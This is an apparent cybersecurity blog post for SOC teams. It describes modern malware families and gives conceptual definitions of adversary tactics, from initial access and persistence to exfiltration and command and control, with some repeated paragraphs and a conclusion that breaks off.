Thursday, March 28, 2024

SOC Second Defense Phase – Understanding the Cyber Threat Profiles

In the first phase of architecturing the SOC, we have seen the basic level understanding of the attacks and necessary steps to breaking the Attack Chain. Let’s move on to the phases of SOC and advanced level of protecting the organization from various Threat Profiles.

Early years, when we say the virus, it’s just an ‘exe’ file with some pop-ups. Most of the viruses created by script kiddies and they don’t cause any damages to any PCs.

But the modern-day malware is not created by script kiddies, but they are developed by companies for profit and there are motives and agenda behind every malware created.

Malware families were grouped into virus/ worm/ PUP/ Spyware/ Adware/ Polymorphic Virus/ FakeAV/ Screensaver Virus. These won’t create much impact or there will be no business motive behind these.

Threat Profiles
Threat Profiles

But, nowadays the Threat Profiles & modern malware landscape is huge and wider with unique ways of codings, this malware having in-built capabilities of downloading a further piece of malicious codes, exfiltrate data, communicate outside servers, data erase, encrypt the files and much more.

This modern-day malware is created with agenda, modus, money-minded, etc.

Malware families were grouped into virus/ worm/ PUP/ Spyware/ Adware/ Polymorphic Virus/ FakeAV/ Screensaver Virus.

These won’t create much impact or there will be no business motive behind these.

But, nowadays the modern malware landscape is huge and wider with unique ways of codings, this malware having in-built capabilities of downloading a further piece of malicious codes, exfiltrate data, communicate outside servers, data erase, encrypt the files and much more.

This modern-day malware is created with agenda, modus, money-minded, etc.

The modern day malware families will be, Trojans/ Rootkit/ Bot/ Botnet/ POS Malware/ ATM Malware/ Ransomware/ Cryptomining Malware/ Spybot/ Wiper/ CnC Trojan/ Exploit Kit/ Browser Hijacker/ Credential Stealer/ RAT/ WMI Backdoors/ Skeleton Key/ Keylogger etc..

Also you can learn SOC Analyst – Cyber Attack Intrusion Training | From Scratch

So, the basic understanding of modern threats becomes necessary for every SOC team. Understanding the threat profiles is much more important in SOC monitoring.

SOC should know what they are dealing with, they should understand the behavior, they should differentiate the pattern, they should know the variants released by hackers community and also SOC team should know the ways to handle it without any disrupt.

Threat Profiles are the types of the malware/scripts/vulnerable abused applications/ Network & windows Artifacts used by the cybercriminal (Threat Actor) to accomplish their cyber attack on your organization.
These capabilities can be classified as:

1.) Initial Access – Attackers use to gain an initial foothold within a network.

2.) Execution – Execution of adversary/attacker-controlled code on a local or remote system. This tactic is often used in conjunction with initial access as the means of executing code once access is obtained, and lateral movement to expand access to remote systems on a network.

3.) Persistence – Persistence is any access, action, or configuration change to a system that gives an adversary a persistent presence on that system.

Adversaries will often need to maintain access to systems through interruptions such as system restarts, loss of credentials, or other failures that would require a remote access tool to restart or alternate backdoor for them to regain access.

4.) Privilege Escalation – Privilege escalation is the result of actions that allows an adversary to obtain a higher level of permissions on a system or network. Certain tools or actions require a higher level of privilege to work and are likely necessary at many points throughout an operation.

Adversaries can enter a system with unprivileged access and must take advantage of system weakness to obtain local administrator or SYSTEM/root-level privileges.

5.) Defense Evasion – Defense evasion consists of techniques an adversary may use to evade detection or avoid other defenses. Sometimes these actions are the same as or variations of techniques in other categories that have the added benefit of subverting a particular defense or mitigation.

6.) Credential Access – Credential access represents techniques resulting in access to or control over system, domain, or service credentials that are used within an enterprise environment.

Adversaries will likely attempt to obtain legitimate credentials from users or administrator accounts (local system administrator or domain users with administrator access) to use within the network.

7.) Discovery – Discovery consists of techniques that allow the adversary to gain knowledge about the system and internal network.

When adversaries gain access to a new system, they must orient themselves to what they now have control of and what benefits operating from that system give to their current objective or overall goals during the intrusion.

8.) Lateral Movement – Lateral movement consists of techniques that enable an adversary to access and control remote systems on a network and could, but does not necessarily, include execution of tools on remote systems.

The lateral movement techniques could allow an adversary to gather information from a system without needing additional tools, such as a remote access tool.

9.) Collection – Collection consists of techniques used to identify and gather information, such as sensitive files, from a target network prior to exfiltration. This category also covers locations on a system or network where the adversary may look for information to exfiltrate.

10.) Exfiltration – Exfiltration refers to techniques and attributes that result or aid in the adversary removing files and information from a target network.

This category also covers locations on a system or network where the adversary may look for information to exfiltrate.

11.) Command and Control – The command and control tactic represents how adversaries communicate with systems under their control within a target network.

There are many ways an adversary can establish command and control with various levels of covertness, depending on system configuration and network topology.

Due to the wide degree of variation available to the adversary at the network level, only the most common factors were used to describe the differences in command and control.

Let’s see the variants of malware families which cause more noise as attack vectors in Threat Profiles. This list is not complete, just a sample of variants released.







Threat Profiles




Conclusion – Threat Profiles

Why should I worry about malware and their behaviors?

We should worry! Because modern malware have some specific ways to propagate with a more complex structure of commands to accomplish for further asylum.

Every malware you face, it’s not the responsibility of your organization AV team, it’s the core responsibility of the SOC to understand it’s behavior and the capabilities they possess to intrude in your network.

They won’t alone, in most instances they work combine to get their work done. S

Website

Latest articles

Wireshark 4.2.4 Released: What’s New!

Wireshark stands as the undisputed leader, offering unparalleled tools for troubleshooting, analysis, development, and...

Zoom Unveils AI-Powered All-In-One AI Work Workplace

Zoom has taken a monumental leap forward by introducing Zoom Workplace, an all-encompassing AI-powered...

iPhone Users Beware! Darcula Phishing Service Attacking Via iMessage

Phishing allows hackers to exploit human vulnerabilities and trick users into revealing sensitive information...

2 Chrome Zero-Days Exploited at Pwn2Own 2024: Patch Now

Google has announced a crucial update to its Chrome browser, addressing several vulnerabilities, including...

The Moon Malware Hacked 6,000 ASUS Routers in 72hours to Use for Proxy

Black Lotus Labs discovered a multi-year campaign by TheMoon malware targeting vulnerable routers and...

Hackers Actively Exploiting Ray AI Framework Flaw to Hack Thousands of Servers

A critical vulnerability in Ray, an open-source AI framework that is widely utilized across...

Chinese Hackers Attacking Southeast Asian Nations With Malware Packages

Cybersecurity researchers at Unit 42 have uncovered a sophisticated cyberespionage campaign orchestrated by two...

Mitigating Vulnerability Types & 0-day Threats

Mitigating Vulnerability & 0-day Threats

Alert Fatigue that helps no one as security teams need to triage 100s of vulnerabilities.

  • The problem of vulnerability fatigue today
  • Difference between CVSS-specific vulnerability vs risk-based vulnerability
  • Evaluating vulnerabilities based on the business impact/risk
  • Automation to reduce alert fatigue and enhance security posture significantly

Related Articles